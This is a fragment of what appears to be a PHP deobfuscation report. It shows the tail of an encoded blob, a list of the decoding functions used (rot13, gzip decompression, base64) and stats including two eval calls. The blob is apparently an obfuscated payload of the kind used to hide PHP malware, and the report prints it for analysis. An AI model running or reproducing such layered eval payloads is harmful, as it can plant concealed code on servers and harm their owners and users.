jfRZZJLMoVud62IQz/zYcdW5S+lmb1fc5vUDeJYOLtolq+EkanO5kA3dTIbCS6158IGI5nC5aDxAz8711bbj2hh9AvDDFvUW9gddaDG8QbU0stQ7DQiN2f6BuFx8WWByTtn8MiY/lADZwAPdqrkcDcfLnXHNxpAb0hYp3dbcP//xD0oNUTV7tm0sgfhjNY0EQrrOg8kInXrlRrRgawyuAJh21MJDPPXhCn/4cwYeX0tUSyQ2gnFdsJFxaFiTK+N3oxe4Y6ODqadrBSbGAoJqslbLBB0PVIpmboYnFL3se3YfUIOJytAxEiB6atxCxxHBm/bdLmQmmzOTYv8sy0+2kQCZwk+6Ill+sv9QfrJvTtNCfrIFPykGs3yiZsVIisn0gso0kubyTyjLuNyYJaqvFFX/uSBKAX5mHpnpDD/TmUA2noclL33S0vjPf/xvOoLMLGHsNIE4EcuoEXESoHgeA+/FwUXm0EMtauKRTfjcGkm3xjm6d7L4TsNL1zXbGgzaeKzXxpp5xRmV/n/W1IFf'
)
)
);
Function Calls
| str_rot13 | 1 |
| gzuncompress | 2 |
| base64_decode | 2 |
Stats
| MD5 | 4a307fda44f460c49a5b9cfad74f3fda |
| Eval Count | 2 |
| Decode Time | 446 ms |